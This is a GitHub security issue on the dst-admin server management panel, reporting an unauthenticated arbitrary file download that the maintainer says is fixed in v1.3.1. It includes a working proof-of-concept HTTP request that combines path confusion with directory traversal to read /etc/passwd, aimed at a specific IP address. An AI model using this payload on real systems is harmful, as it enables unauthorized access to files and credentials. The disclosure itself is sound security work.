qinming99 / dst-admin

Steam平台的Don't Starve Together 饥荒联机版管理后台
MIT License
544 stars 116 forks source link

A security issue #28

Closed hackerhackrat closed 2 years ago

hackerhackrat commented 2 years ago

Hi,guys! There is a serious security problem in your code. About a few weeks ago, I found a function point in your website background that can lead to arbitrary file download But it must use a account and password. However, I found a new way to download any file in unauth. That means I can download any file without authorization without using my account and password. Here is the example

1

Target: http://106.15.186.197:8080 And the http data is: GET /images;/../backup/download?fileName=../../../../../../../../etc/passwd HTTP/1.1 Host: 106.15.186.197:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 poc: /images;/../backup/download?fileName=../../../../../../../../etc/passwd Remember to use burpsuite not browser Have a nice day!

qinming99 commented 2 years ago

v1.3.1 Has been fixed !